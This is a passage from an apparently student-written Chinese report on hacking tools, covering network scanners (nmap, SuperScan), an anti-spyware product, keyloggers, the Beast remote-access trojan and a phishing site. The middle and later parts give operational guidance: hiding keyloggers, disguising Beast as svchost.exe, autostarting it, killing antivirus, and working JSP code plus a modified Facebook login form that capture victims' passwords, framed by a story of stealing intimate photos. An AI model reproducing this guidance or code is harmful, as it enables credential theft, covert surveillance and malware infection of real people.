HoverIP 是一款免費的網路小工具，它包含了 Windows 系統中各

種在命令行模式下會使用到的網路偵測工具，讓使用者可以不必切換到

命令行模式去輸入指令，只要在視窗介面裡填入相關的數值，那麼網路

偵測的動作自然就會被完成。

功能：

(1)查看電腦網路設定的 ipconfig

(2)DNS 偵錯工具的 Nslookup

(3)路由表 Routing Table

(4)用來偵測對方電腦是否存在網路上的 ping

(5)追蹤路徑的 TraceRoute

(6)掃瞄通訊埠的 port scan(圖 3-1)

22/83

圖 3-1 IP 介面設定

23/83

Nslookup DNS 查詢

圖 3-2 Nslookup DNS 查詢

意思是說，列出全部相關要查詢網域名稱，或者 IP 的全部資料，

輸入 www.yahoo.com.tw (圖 3-2)

yahoo.com.tw nameserver = ns4.yahoo.com

yahoo.com.tw nameserver = ns5.yahoo.com

yahoo.com.tw nameserver = ns2.yahoo.com

yahoo.com.tw nameserver = ns1.yahoo.com

yahoo.com.tw nameserver = ns3.yahoo.com

（這邊是指 yahoo.com.tw 的 DNS Server）

ns4.yahoo.com internet address = 68.142.196.63

24/83

ns5.yahoo.com internet address = 119.160.247.124

ns2.yahoo.com internet address = 68.142.255.16

ns1.yahoo.com internet address = 68.180.131.16

ns3.yahoo.com internet address = 121.101.152.99

（這邊就是指 ns3.yahoo.com 的 IP）

Ping

圖 3-3 Ping 之功能

一般人最常用的應該是 Ping ，用在偵測遠方的電腦是不是存在網

路上，有沒有掛掉。

25/83

下面以 Ping 作功能示範(圖 3-3)：

以學校宿舍來 Ping 163.17.83.50

回覆自 163.17.83.50 目的地網路無法連線。

要求等候逾時。

圖 3-4 Ping(2)之功能

用 PCHome的主機 IP，就能夠收到回覆，這表示學校防火牆擋住，

外來的 PING。

以 PCHome 作 示 範 ， 可 以 知 道 代 表 主 機 的 IP 是

210.59.230.60 ，( loss 0%) 代表網路之間溝通正常，封包傳遞無遺

失，而 67ms 代表兩者之間在網路上的反應速度，愈小表示速度愈快

(圖 3-4)

26/83

Traceroute

圖 3-5 Traceroute 之功能

Traceroute 是用來偵測主機到目的主機之間所經路由情況的重要

工具，也是最便利的工具。前面說到，盡管 ping 工具也可以進行偵測，

但是，因爲 ip 頭的限制，ping不能完全的記錄下所經過的路由器。所

以 Traceroute正好就填補了這個缺憾。

成功的經過 2 個路由器(圖 3-5)

27/83

圖 3-6 Tracerout(2)之功能

失敗的找不道路徑(圖 3-6)

使用之後的優缺點：

有圖形化的界面，讓使用者可以更加方便，不用在 Windows 系統模式

打下指令，只要在視窗介面裡填入相關的數值，那麼網路偵測的動作自

然就會被完成，但是還是會被一些防火牆檔住。

28/83

3.1.2 Port Scanner 介紹

它可以掃描每個 port 是否開啟，可以探知電腦開了哪些服務，例如 21

有開，這台很有可能是 FTP站，23 有開，這台很有可能是 BBS站

Port Scanner

圖 3-7 Port Scanner

「Port Scanner」可以掃描指定 IP的電腦有開放哪些 PORT。(圖 3-7)

29/83

Ping Scanner

圖 3-8 Ping Scanner

「Ping Scanner」可以掃描哪些電腦正在線上，或區域網路中有哪些電

腦正常運作中。(圖 3-8)

Trace

圖 3-9 Trace

30/83

「Trace」工具可以顯示由你的電腦連線到對方電腦或網站共經過哪些

節點與回應速度。(圖 3-9)

Host Monitor

圖 3-10 Host Monitor

「Host Monitor」可以同時監視多個網站或電腦，看看這些電腦是

否活著、反應速度如何。其他還有一些滿實用的小工具，可以參考下面

官方網站的說明。(圖 3-10)

優點：搜尋快速 簡易搜尋

缺點：只能同一個網段搜尋 無法跨網段

31/83

3.1.3 Nmap

Nmap 是收錄於 Red Hat Enterprise Linux 中的一個相當受歡迎

的工具，可以用來找出一個網路的配置。 Nmap 已經使用多年，而且也

許是用來蒐集網路資料最常被使用的工具。也收錄了相當棒的 man

page 以提供關於它的選項與用法的詳細說明。系統管理員可以在網路

中使用 Nmap 來找出主機系統以及在這些系統中所開啟的連接埠。

Nmap 足以勝任安全弱點偵測的第一步驟，可以找出網路內部的所

有主機，甚至可以使用一個選項，讓 Nmap 來試圖找出一部特定主機所

執行的作業系統。 Nmap 是一個很好的基礎，以用來設立使用安全服務

與停止未使用服務的方針。

使用 Nmap

請在 shell 提示符號下輸入 nmap 指令執行 nmap，再加上要掃描

機器的主機名稱或 IP 位址。

nmap foo.example.com

Nmap掃描的結果（掃描將會花上一些時間，取決於該主機的 IP位置）

將會類似以下的輸出：

Starting nmap V. 3.50 ( www.insecure.org/nmap/ )

Interesting ports on localhost.localdomain (127.0.0.1):

(The 1591 ports scanned but not shown below are in state:

closed)

32/83

Port State Service

22/tcp open ssh

25/tcp open smtp

111/tcp open sunrpc

443/tcp open https

515/tcp open printer

950/tcp open oftep-rpc

6000/tcp open X11

Nmap run completed -- 1 IP address (1 host up) scanned in

71.825 seconds

Nmap 為聆聽與等待服務最常用的網路通訊連接埠進行測試，這個

方法對想要關閉不需要或非使用中之服務的系統管理員來說是很有幫

助的。

33/83

Host

圖 3-11HOST 搜尋目標主機 IP 位置

開啟 Namp 程式後，在 HOST(S)裡面輸入要偵測的目標主機 IP 然後按

SCAN按鍵 就可以偵測該主機系統(圖 3-11)

34/83

圖 3-12 HOST 資料

這是偵測到該主機 IP 後所得到系統資料(圖 3-12)

35/83

圖 3-13 對方 PORT

圖 3-13 所示出現的 PORT 是偵測 IP 主機後所得到的系統資訊可以

了解對方電腦開啟哪些 PORT 等等

36/83

指令說明：

nmap -sP 192.168.1.0/24

使用 ping 掃瞄子網路內的所有 IP，並列出有回應的 IP，不作進一步測

試。

nmap -sL 192.168.1.0/24

列出子網路所有 IP 及對應的主機名稱，但不作 ping 及通訊埠偵測。

nmap -PS 192.168.1.234

偵測遠端主機已開啟的通訊埠，為縮短掃瞄時間，可指定特定的埠號，

ex. -PS22,23,80,25

nmap -PU 192.168.1.0/24

使用 UDP協定 ping 遠端的主機。

nmap -sS 192.168.1.0/24

使用 TCP SYN 掃瞄，這是一個半開放的掃瞄方式，所以掃瞄速度較快，

也比較常被使用。這可以列出有回應的遠端主機已開啟的網路服務埠。

nmap -sT 192.168.1.0/24

如無法以 SYN 掃瞄時，就得改用 TCP connect 來掃瞄，這也是預設的

掃瞄方式。

nmap -sU 192.168.1.0/24

用 UDP協定掃瞄遠端主機群。

nmap -sO 192.168.1.19

偵測遠端主機已開啟哪些通訊協定 TCP,UDP,ICMP,...

37/83

nmap -O 192.168.1.19

nmap -A 192.168.1.19

偵測遠端主機的作業系統類型

nmap -v scanme.nmap.org

掃瞄遠端主機，並列出相關詳細的資訊。

nmap -sS -O scanme.nmap.org/24

以 SYN 秘密掃瞄網域為 scanme.nmap.org 所屬 C 子網段的所有存在的

主機作業系統類型。

nmap -sV -p 22，53，110，143，4564 198.116.0-255.1-127

進行主機列表及 TCP 掃瞄特定網路服務，遠端主機的網路含括

198.116.(0-255).(1-127) 網段下。

nmap -v -iR 100000 -P0 -p 80

隨機選擇 100000 台主機，偵測是否開啟 Web 服務，由於此掃瞄較耗

時，所以加上-P0 不作主機列表

缺優點:

namp功能如此強大，使用過後發覺到，它可用性非常高，如:偵測他人

的作業系統，port是否開啟…等等。是一個非常好用的一套偵測軟體

38/83

3.1.4 Spy Sweeper

Spy Sweeper 是 Webroot 所出品的後門程式清除軟體，它結合了

木馬掃瞄程式以及個人隱私記錄反追蹤等功能於一身，可深層掃瞄出暗

藏在系統中的駭客程式，讓使用者在使用網路時能夠更妥善地管理自己

的私人資料，不至於外洩。

(1) Spy Sweeper自動偵測功能，可以移除所有一般形式的間諜程式，

包含特洛伊木馬、系統監視、鍵盤紀錄及廣告軟體

(2) 將隱私權還給您，預防間諜程式紀錄你的一舉一動

(3) 保護你的身份資料安全，預防信用卡資料被竊

(4) 嚇阻不道德的市場商人、詐騙高手、私家偵探的追蹤 - 偵測及移

除已存在於電腦中的間諜程式

(5) 預防危險的木馬程式對你的個人電腦展開復仇式的攻擊

(6) 掌控你的電腦，紀錄檔及詳細的間諜程式定義，給你必要的知識來

判斷是否該執行某個程式。

39/83

主控區

圖 3-14 Spy Sweeper 首頁

圖 3-14為 Spy Sweeper主控區常用的工作、訊息都在這裡，也會提醒

你最近掃描是什麼時候，如果很久了，是否需要在掃描一次，確保電腦

一直在安全之中。也會提醒妳本軟體是否持續防護中，看使用者要開著

還是關著，開著的話會自動攔截外來的威脅，關著有可能外來的威脅會

跑進電腦裡面就不太好了。另外也會提醒你是否要更新了，也可設定自

動更新。

40/83

Sweep

圖 3-15掃描工作區

掃描工作區

（有 Full Sweep、Quick Sweep、Custom Sweep三種掃描類型可以選擇）

要自訂掃描範圍的話，可以從 Home→Sweep→Edit 或 Option→Sweep

或是直接在此區右下角點 Sweep Options 變更項目範圍。(圖 3-15)

41/83

圖 3-16 Spy Sweeper 掃描中

圖 3-16 顯示正在掃描電腦的實際狀況，掃描時間依據電腦速度以

及電腦中檔案數量不同會有非常大的差異(圖 3-16)

42/83

圖 3-17掃描結果

掃描過程中看畫面的最下方可以看到被掃描出來的項目有什麼東西

Adware 指的是廣告軟體，會出現煩人礙眼的廣告

Trojan 指的是特洛伊木馬，有可能因此資料被竊取

Cookie 指的是瀏覽器在這台電腦中留下某些紀錄，一般來說影響不大

System Monitor 指的是這台電腦被安裝了某些監控程式，可以得知這

台電腦的狀態，所輸入的按鍵文字等(圖 3-17)

43/83

圖 3-18隔離威脅

畫面會顯示已經把威脅給隔離，之後到隔離區依危險性給予刪除(圖

3-18)

44/83

防護設定區

圖 3-19防護設定區

也無須更改設定，有特別需求的才自行更動設定(圖 3-19)

45/83

隔離區

圖 3-20隔離區

掃描後或是軟體自行偵測到可疑的檔案項目會隔離到此區，並標明

危險種類、檔案項目路徑、圖表顯示危險等級，接著把你認為有問題的

項目勾選，按下方的 Delete Selected Items進行刪除，或是把你認為

沒有疑慮的檔案項目，勾選後按 Restore Selected Items 復原。(圖

3-20)

46/83

Options

圖 3-21 Option

Sweep：選 Full Sweep的話除了設定外，是全系統掃描選 Quick Sweep

的話會快速系統掃描選 Custom Sweep→Change Settings，有

Where to Sweep、What to Sweep、Skip File Types、Advanced

Options 四種細部設定選項，其中 Where to Sweep 比較常用

到，可以設定系統裡哪些硬碟、資料夾、檔案要掃描，Skip File

Types 可以輸入要排除的檔案類型副檔名排除掃描 （for

example： .mp3、.wma、.jpg）大致上來說，基本設定都可以

不用更動，要是不想每次都全系統掃描的話，去 Custom Sweep

自行設定要省略的硬碟、資料夾、檔案。(圖 3-21)

Schedule：設定掃描工作排程

Shields：無須更動設定

Always Apply：當掃描後隔離後，除了在隔離區（Quarantine）殺掉的

47/83

項目外，還可以到此區（Options→Always Apply）進

行發現的檔案項目自動處理的方式做設定，有以下四

種：Show All Items、Always Ask、Always Ignore、

Always QuarantineUpdate：更新的設定，預設已經設

成自動偵測＆下載更新防護定義檔（預設的 daily 就夠

了，無須改設定成 hourly，因為官方沒有那麼頻繁的

更新定義檔）要是自行點擊下方的 Update Spy Sweeper

則會立刻檢查下載更新定義檔。

Program：另有 Display、Proxy Settings、Other Options可以設定，

在 Other Options 中可以設定軟體是否要於 Windows 開始後

啟動（Load Spy Sweeper at Windows startup）

使用之後的優缺點：

使用之後覺得效用還不錯,可以偵測些木馬,COOKIE間諜程式

缺點就是她會有免費使用期限過期之後,他就不會更新病毒碼就不能更

新現在的最新病毒碼就有可能會有漏洞,還有此版本不包含防毒的功

能，所以基本的防毒軟體還是要裝，防毒就交給專門的防毒軟體

48/83

3.1.5 Super Scan 4.0

這款程式是屬於簡易的掃描和偵測程式，檢測的速度較快較有效

率，但沒有像是木馬具有遠端遙控的能力，是一個沒有破壞性的軟體。

圖 3-22 Super Scan 4.0執行檔的圖示

SuperScan4.0具有以下功能：

（1）通過 Ping來檢測 IP 是否在線上。

（2）IP和主機名稱相互轉換。

（3）檢測目標電腦提供的系統版本類別。

（4）檢測一定範圍目標電腦的是否在線和連接埠情況。

（5）工具自訂列表檢測目標電腦是否在線和連接埠情況。

（6）自訂要檢測的連接埠，並可以儲存為連接埠列表文件。

（7）軟體自帶一個木馬連接埠列表，通過這個列表我們可以檢測目標

電腦是否有木馬。

49/83

圖 3-23 Super Scan 4.0的使用介面

這是它的使用介面，因為目前這支程式沒有中文版本，所以在圖示上面

有提供了中文翻譯，我們根據共享功能來介紹使用。(圖 3-23)

50/83

圖 3-24 Super Scan 4.0 Scan

主機名稱和 IP 相互轉換：

這個功能的作用就是取得域名比如：163.com 的 IP；或者根據 IP：

202.106.185.77 取得主機名稱。

在 SuperSca4.0裡面，有兩種方法來實現此功能：

（1）通過 Hostname Lookup 來實現

在 Hostname 的輸入框輸入需要轉換的域名或者 IP，按【執行】

就可以取得結果。(圖 3-24)

51/83

圖 3-25轉換 IP

（2）通過 Extract From File 實現

這個功能通過一個網域列表來轉換為相應 IP位址。

選項【ReadIPs from file】，點擊【->】按鈕，選項進行轉換，

出現以上(圖 3-25)界面

52/83

Ping 功能的使用

圖 3-26 Super Scan 4.0檢測

Ping 主要目的在於檢測目標電腦是否在線和通過反應時間判斷網

路狀況。在【Start IP】填入起始 IP，在【End】填入結束 IP，然後，

按下【Start】就可以檢測了。(圖 3-26)

一般採用預設就可以了，而且，SuperScan速度非常快，結果也很

準確，一般沒有必要改變反應時間設定。

53/83

連接埠檢測

圖 3-27 連接埠檢測

連接埠檢測可以取得目標電腦提供的服務，同時也可以檢測目標電腦是

否有木馬。現在，我們來看看連接埠檢測的具體使用。

（1）檢測目標電腦的所有連接埠

如果檢測的時候沒有特定的目的，只是為了瞭解目標電腦的一些

情況，可以對目標電腦的所有連接埠進行檢測。一般不提倡這種

檢測，因為：

1.它會對目標電腦的正常執行造成一定影響，同時，也會引起目

標電腦的警覺。

54/83

2.掃瞄時間很長。

3.浪費帶寬資源，對網路正常執行造成影響。

（2）掃瞄目標電腦的特定連接埠（自訂連接埠）

其實，大多數時候我們不需要檢測所有連接埠，我們只要檢測有

限的幾個連接埠就可以了，因為我們的目的只是為了得到目標電

腦提供的服務和使用的軟體。

所以，我們可以工具個人目的的不同來檢測不同的連接埠，大部分時

候，我們只要檢測 80（web服務）、21（FTP 服務）、23（Telnet服務）

就可以了，即使是攻擊，也不會有太多的連接埠檢測。

以上的界面中(圖 3-27)，在【Host and Service Discovery】選項需

要掃瞄的連接埠，選注意左邊的【UDP port scan】和【TCP port scan】，

這裡有關於此連接埠的詳細說明和所使用的程序。

SuperScan4.0 的優缺：

優點: 可以利用 Ping 了解 ip 是否在線上、也可以讓 ip 與主機名稱自

由切換查詢、可以查詢主機使用什麼作業系統、透過埠可以略知

對方電腦在做什麼事情。

缺點: 只是可掃描基本的工具，並不能向對方主機攻擊！例如:使對方

重新開機、關機、或是讓光碟機退出之類的，比較沒有攻擊性，

功能較多於在探測性。

55/83

3.2 System Hackering (系統攻擊工具)

系統攻擊工具有很多種，例如：LCS5setup.exe、LCP Tool、Beast2.07、

Keylogge、007Spy software、FamilyKeyLogger 等，以下為你介紹幾

個工具使用方法：

以下為你介紹幾個工具使用方法

3.2.1 鍵盤側錄（Keylogger）

圖 3-28 Keylogger使用介面

Keylogger 是一個紀錄電腦使用者 key in 的程式，會把使用者所有輸

入的文字或符號記錄下來。

這是他的操作介面(圖 3-28)，淺顯易懂。

Start：進行鍵盤輸入的側錄開始

Stop：停止鍵盤輸入的側錄

56/83

Option：工具選項

Pass：可以讓使用者擁有自己的密碼

View Log：打開側錄檔案

Minimize：縮小到右下角

Hide：把 Keylogger 隱藏起來，按快捷鍵才能讓他出現

Exit：離開 Keylogger

Option

圖 3-29 Option

這是他工具選項(Option)的操作(圖 3-29)

1.保留儲存紀錄的時間

2.花多少記憶體儲存這些紀錄

57/83

3.開機就執行此程式

4.是否將記錄寄至 E-mail

5.將紀錄上傳至 FTP

6.隱藏 縮小視窗的快捷鍵

View log

圖 3-30 側錄內容

這個圖顯示的是被側錄的文字(圖 3-30)

優點：有效的記錄使用者的輸入

缺點：雖有回傳功能 有時候卻無法傳回信箱 查不到原因

58/83

3.2.2 Beast2.07 遠端病毒遙控

Beast是一個遠程管理木馬，由 Tataye 使用 Delphi編寫。 Beast 與

其他木馬的最大差別在於，它將客戶端、服務器及服務器配置程序做在

了一個可執行文件中。

圖 3-31 Beast2.07介面

圖 3-31 給出了 Beast的工作界面，下面分兩部分介紹這個木馬：

服務器設置和客戶端。

59/83

Beast 服務器設置

表 3-1 Beast 服務器設置

設 置 選 項

基本（ Basic ）

設置服務器的名稱、端口和口令。也用於

選擇如何打包這個木馬及將它放置在哪

一個目錄下。

通知

（ Notifications ）

配置如何向你報告已感染主機的信息，可

選方式包括 CGI 、電子郵件、 ICQ 及靜

態 IP 地址通知（ SIN ， Static IP

Notification ）

啟動（ StartUp ）

配置在 Windows 啟動時如何啟動這個木

馬。 選項包括 ActiveX 、 HKey Local

Machine 和 HKey Current User

停止防病毒程

（ AV-FW Kill ）

配置 Beast 停止任何防病毒程序或防火

牆

其他（ Misc ） 配置鍵盤記錄、偽造出錯消息以及其他選

項

Exe Icon 配置 Beast 服務器使用的圖標

要訪問 Beast 的服務器設置，單擊“Build Server”按鈕，可以進行六

方面的配置，如表 3-1 所示。

60/83

圖 3-32 Basic服務器選項

圖 3-32展示了 Basic 服務器設置中的選項。

首先，輸入服務器的名稱，可以根據需要設置連接到這個服務器上

的口令。 某些惡意黑客使用口令來阻止其他惡意黑客連接到這個木馬

上。 當選擇服務器名稱時，選擇一個與某個 Windows 可執行程序接近

或相同的名稱，如 svchost.exe。 這種方法也提供了一定的隱蔽性，

原因在於看到 svchost.exe 在運行的系統管理員沒有辦法知道它是一

個木馬。 但是，不要把木馬與同名的合法程序放置在同一個目錄下，

這樣將會覆蓋系統文件。 放置這個木馬的位置有兩處：Windows 目錄

或 Windows/system目錄。 如果合法文件放置在 Windows目錄下，那麼

就將這個木馬放置到 Windows/system 目錄下；反之，如果合法文件放

置在 Windows/system 目錄下，那麼就將這個木馬放置到 Windows 目錄

下。

接下來，需要配置服務器的連接方式，可選方式有兩種：直接連接

和反向連接。 直接連接時，在客戶端中手工輸入被感染主機的 IP 地

址，然後直接連接到木馬上。 反向連接時，木馬向你通知它的 IP 地址，

之後木馬服務器發起到客戶端的連接。 如果選擇使用反向連接方式，

61/83

那麼需要輸入靜態 IP 地址通知（SIN）端口號或者使用默認端口 9999。

如果選擇使用直接連接，那麼不需要配置 SIN端口號，但通常應該配置

偵聽端口號，默認為 6666。

下一步要配置注入木馬的方式。 我們可以把這個木馬綁定到

Internet Explorer、 Explorer.exe、或其他可執行程序上，如

Notepad.exe。 我們也可以選擇不包裝這個木馬，但隱蔽性會受到威脅。

圖 3-33 Notifications 選項

如果需要在服務器感染上電腦後通知我們，那麼需要配置通知的方

式，單擊“Notifications”按鈕，如圖 3-33 所示，可用選項包括：靜

態 IP 地址通知、電子郵件、ICQ及 CGI。

62/83

圖 3-34 StartUp 的選項

將木馬植入到目標機器並運行木馬僅僅是萬里長征走完了第一

步，我們還需要配置被感染系統，以便在系統啟動時運行木馬。 單擊

“StartUp”按鈕，在這裡完成啟動的配置任務(圖 3-34)。 這裡提供

了三種選擇：ActiveX 方法、HKey Local Machine和 HKey Current User。

當我們將木馬綁定到 IE 瀏覽器上時，僅僅選擇使用 ActiveX方法。HKey

Local Machine選項在註冊表中添加一個所有用戶登錄機器時都啟動木

馬的註冊表項，而 HKey Current User選項在註冊表中添加一個只有當

前用戶登錄時才啟動木馬的註冊表項。

圖 3-35 AV-FW Kill 選項

設置了啟動選項後，設置 AV-FW Kill（防病毒和防火牆程序處理）

選項，(圖 3-35)。 Beast 能夠認出數百個常見的防火牆和防病毒軟

件，包括 XP 內置的防火牆。 利用這個特性，我們可以終止這些安全軟

63/83

件的運行。 由於大多數防病毒程序和防火牆都配置為被終止時重新啟

動，因此，Beast 提供了一種每過一段時間就終止一次安全軟件的選

項，默認時間間隔為 5 秒。

圖 3-36 Beast其他選項

Beast 還提供了其他一些服務器選項(圖 3-36)。 常用選項包括安

裝時溶化服務器（Melt Server On Install）、打開鍵盤記錄功能、清

除 Windows XP的恢復點等。 安裝時溶化服務器選項指示服務器，在木

馬運行之後，從硬盤上刪除木馬服務器文件。 此時，木馬依然在內存

中運行，但在被感染主機的硬盤上已經刪除了木馬的可執行程序。 當

選擇這個選項時，就不能再選擇 Windows 啟動選項了，原因在於計算機

重新啟動之後，木馬文件在硬盤上已經不存在了。 打開鍵盤記錄選項

可以監控用戶在被感染主機上的按鍵操作。 第三個選項是清除恢復點。

恢復點是 Windows XP 提供的一項功能，用於在計算機系統操作破壞時

恢復到前一個狀態。 選中這個選項後，阻止計算機恢復到以前系統良

好的狀態。

64/83

圖 3-37 Beast Exe Icon

服務器的最後一個設置是選擇服務器使用的圖標，這個功能的名稱

為 (圖 3-37)。 儘管這裡所做的選擇對於木馬的功能來說沒有什麼影

響，但我們依然應該選擇一個 Windows 圖標，以便不引起人們的懷疑。

如果我們要通過電子郵件發送木馬，那麼這一點十分重要，原因在於用

戶看到圖標後會權衡相應的程序是否安全。

在完成了服務器選項的設置之後，單擊“Save Server”按鈕保存

木馬服務器。 下面要做的工作就是把木馬上傳到目標主機上，並在目

標主機上執行這個木馬，這一點與其他木馬的工作方式完全相同。

很多防病毒軟件都能夠把 Beast檢測為木馬，並且不允許安裝它。

如果我們想要繞開防病毒程序和防火牆的檢測，那麼就要使用修改版的

Beast。 Beast 的作者提供這樣的修改版，但要支付少量的費用。 它

改變這個程序，生成防病毒軟件不會檢測到的一位拷貝。

65/83

Beast 的客戶端

圖 3-38 Port 設定

當在目標主機上上傳並執行了該木馬後，就需要遠程控制服務器

了。 此時，在 Beast 程序窗口中輸入 IP 地址，需要時輸入口令，之後

單擊“Connect”按鈕。 如果前面服務器配置時指定了不同於默認端口

號 6666的端口號，那麼輸入這個端口號，之後就會看到如圖 3-38 所示

的界面。

優點：可以遙控對方電腦以及竊取資料

缺點：必須讓使用者執行才有遠端功能

66/83

3.2.3 英文數字字典檔

圖 3-39 字典檔介面

可以自動產生字典檔，產生器的程式碼，使速度非常快。(圖 3-40)

67/83

圖 3-40 字典檔生成

這字典檔算是比較陽春型的，只能英數配合或者數英，不能夠混合

產生。(圖 3-40)

68/83

3.2.4 數字、字母、符號 混合字典版

圖 3-41 字典檔加入#字號混英文

圖 3-42字典檔英數混合

69/83

圖 3-43 字典檔符號混合

圖 3-44 字典檔年月日混合

軟體化的字典檔產生器，什麼密碼都能產生，速度卻較慢。

見(圖 3-41)(圖 3-42)(圖 3-43)(圖 3-44)

70/83

3.2.5 FamilyKeyLogger

如果你想知道別人在你自己的電腦做什麼在，

請安裝家庭鍵盤記錄，你回來後，

你可以按下熱鍵來取消隱藏。

系列中的關鍵記錄器

會讓你知道你電腦今日發生過什麼事

圖 3-45 FamilyKeyLogger 介面的一些功能設定

開啟 FamilyKeyLogger-setup 的選項會出現上列(圖 3-45)

圖 3-46 取消隱藏按熱鍵默認情況下

71/83

點選 Hide icon(隱藏) 會出現下列(圖 3-46)

圖 3-47 FamilyKeyLogger 基本操作設定

點選 options 會出上列選項(圖 3-47)

72/83

圖 3-48 FamilyKeyLogger 會記錄電腦今日所做的任何事件

點選 view log 會出現下列(圖 3-48)

記錄中 是今天電腦發生任何事的記錄檔案

優點：Family Keylogger 會讓電腦的所有者知道當你不在電腦時，

可以觀察哪些程式被啟動過，或是電腦中輸入了哪些資料

方便檢查自己電腦有沒有被動過手腳。

缺點：電腦鍵盤所輸入的中文字，並不會出現中文字，例如：中文字

的”你好嗎”會出現”SU3LC3A8”這種類型，因為此款程式是

國外開發的。

73/83

第四章 入侵範例實作

釣魚網站(Phishing)詐騙手法層出不窮，偽造一個正規經營的商業

網站，利用網站的域名和網頁的相似度，降低使用者的警戒心，再誘

騙使用者輸入帳號密碼，盜竊使用者的所有個人資料。使用者常常很

容易一時疏忽，導致個人損失慘重。

4.1 何謂釣魚網站

電腦安全領域裡，釣魚攻擊，又稱「網釣法」或「網路釣魚」，

是一種企圖從網頁中，透過偽裝成信件或網頁的方法以獲得用戶帳

號、密碼等個人的犯罪詐騙過程。

來自於社交網站（Facebook）以此來誘騙受害人的相信。網路釣

魚通常是透過 e-mail 或者即時通訊進行。它常常導引用戶到 URL與

介面外觀與真正網站幾乎沒有不一樣。就算使用強式加密的 SSL伺服

器認證，要偵測網站是否仿冒實際上仍很困難。

網釣是一種利用社會工程技術來愚弄使用者的實例。

以下為你介紹如何製作

74/83

4.2 資料庫記錄帳密和轉址系統

要做釣魚網站之前，要先製作一個 JSP 的網頁讓駭客可以載入資料

庫，讓上鉤的使用者的帳號密碼存回自己的電腦並跳回原本的網頁

4.2.1 何謂轉址?

英文將轉換網址這個動作叫 "redirect"，即重新加另外一個網

址的意思，顧名思義，將你所註冊的網域名稱重新導入另一個網址所

在的網頁，使用者只要在瀏覽器的網址欄位輸入或者點到你所改的網

址，就可以連到那個網頁。

4.2.2 何謂資料庫?

大量使用電腦軟體進行儲存和歸納的資料，而且允許合法使用者

針對這些資料進行增加、刪除、更新、搜尋、尋找和取出的動作。

75/83

4.2.3 JSP 資料庫回傳和轉址解說

以下是 JSP 網頁的程式碼

<%

String email = request.getParameter("email");

String pass = request.getParameter("pass");

String db_url =

"jdbc:mysql://127.0.0.1:3306/account";

Class.forName("com.mysql.jdbc.Driver"); // (載入 jdbc

驅動)

Connection cn = DriverManager.getConnection(db_url,

"****", "****sx");

(連線資料庫)

Statement st = cn.createStatement();

String sql = "insert into abc (ip,email,pass) values('"

+ request.getRemoteAddr() + "','" +

request.getParameter("email") + "',' " +

request.getParameter("pass") + "')";

(將取得的”來源 IP”、”帳號”、”密碼”三個值，回傳

到資料庫裡)

st.executeUpdate(sql);

st.close();

cn.close();

76/83

%>(結束語資料庫的連線)

<form method="post"

action="http://www.facebook.com/">

(跳回去原本的 FACCEBOOK的網址>>>轉址功能)

</form>

<script type="text/javascript">

var form = document.forms[0];

form.submit();

</script>

77/83

4.3 釣魚網頁修改

寫好 JSP 的 網頁程式，就可以更改你所要轉址的釣魚網頁。

4.3.1 FACEBOOK 的網址修改

<FORM id=login_form

onsubmit=';var d=document.documentElement;if (d.onsubmit)

{ return d.onsubmit(event); }else { return Event.fire(d,

"submit", event); }'

method="POST" action="https://login.facebook.com/login.php?

將此原本複製下來的網址

改成下列網址

method=post action="http://163.17.68.48/login2.jsp"><INPUT

修改此網址 可以 回傳 帳密 及 轉址功能

如圖 4-1所示

圖 4-1修改登入網址

修改後就可以做成 EMAIL 去收集資料

78/83

4.4 釣魚網站的小品影片

這篇影片的開頭，是以一個情侶分手後的背景做為題材。

故事大綱

在一個寧靜的下午，小恩和小東正在討論著午餐要吃什麼時候，小恩

的手機突然響了，打來的是小恩的前女友，小東聽了小恩和他手機另

一端的人對話後，發現小恩友和他前女友的親密照片鎖在 FACEBOOK，

於是小東找了他的好友駭客小嗡交他做一個釣魚網頁(圖 4-1)，到了

教室小嗡教了小東做釣魚網頁後(圖 4-2)，回到宿舍後隨即小東做了

一封臉書的邀請加入好友信件寄給小恩，小恩在不知情的情況下收了

信件，點入了釣魚網頁被釣了帳密，小東得到帳號密碼後(圖 4-3)，

就進入小恩的臉書盜取了他們的親密照片

79/83

圖 4-2影片截圖

圖 4-3 影片截圖

80/83

圖 4-4影片截圖

影片播放

http://www.youtube.com/watch?v=L-pv0dUWDYg

81/83

第五章 問題討論

5.1 問題探討

蒐集資料：一開始接觸到駭客這方面的相關議題時，因為本組成

員對駭客入侵技術的問題幾乎都是一知半解而已，所以剛開始我

們蒐集了許多的駭客資料，也看了許多的相關書籍，現在這方面

的資料取得容易，但在網路閱讀駭客相關的資料，也讓組員們花

費了不少的時間和心力。

駭客工具操作：在針駭客入侵的工具方面，我們花了一段不短的

時間，因為有些軟體是英文介面讓本組花了更多時間去研究和在

偵測跟產生木馬遇到的問題，同時也請教了這方面的老師和學長

來輔助本組，讓我們能夠更熟練駭客工具的運用。

拍片:本組有拍了一段趣味的釣魚網站影片，在開始拍片的劇本

就讓組員們絞盡腦汁，在來到拍攝影片的場景，也花了一些時間

去尋找，還跟朋友借了錄影器材來拍攝，畢竟不是專業的所以在

剪接方面還請了數媒朋友幫忙，就是希望大家能夠更了解釣魚網

站。

‧

‧

82/83

文獻參考:

[1]http://www.hacker.org.tw/?c=articles_show&articleid=1051

網路滲透測試 (書本)

[2]EC-Council Official Lab Manual

[3]http://anti-hacker.blogspot.com/ (網路攻防戰)

[4] http://eservice.seed.net.tw/class/class75.html

IP Scan參考資料

[5]http://forums.neten.game.tw/showthread.php?s=8a6fce61dd2

2e5845ffff5712aa723cc&threadid=3174 Spy Sweeper參考資料

[6] http://wikipedia.tw/ 維基百科

[7] http://www.51cto.com/ Beast2.07參考資料